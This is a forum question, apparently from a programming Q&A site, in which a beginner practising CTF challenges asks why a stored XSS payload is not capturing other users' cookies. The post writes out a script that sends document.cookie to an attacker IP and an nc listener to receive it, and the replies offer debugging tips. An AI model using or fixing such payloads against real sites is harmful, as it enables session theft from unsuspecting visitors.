# Stealing user cookies using Stored XSS

Tags: javascript, cookies, xss

I am new to Computing field and I am currently doing some practise CTF challenges on one of those vulnerable websites and found a XSS vulnerability. I know that I can use a stored XSS to steal the user cookies but I don't know why my code is not working, as in why when another user goes onto the vulnerable page then their cookie isn't being recorded on my end.

I inputted in this XSS injection in the text box `<script>    document.write('<img src="http://l92.168.48.6:6790?cookie ='+ escape(document.cookie) + '" />);</script>` But then, in the linux terminal I type `nc -l -p 6790` and I don't receive any cookie whatsoever. Like if I do `<script>alert(document.cookie)</script>` it shows my cookie - but my intention is to steal the next users cookie, i.e. when a user visits the page.

I am sure it is something so trivial for you guys but please help a fellow noob out. Im new to cyber security and am self teaching myself.

Answer (score 0):

Try to replace the escape method with encodeURIComponent method

What do you get actually ? Did you check the network console on your browser ? to know if the request is send ?

Comment: Hi, as in when I visit the page, i can see the contents of `document.cookie` on my terminal. But then when other users go on the same page then I can't see anything.

Comment: I mean when you load the page with the script, did the request is send in the network console ?

Comment: No its not stealing the cookie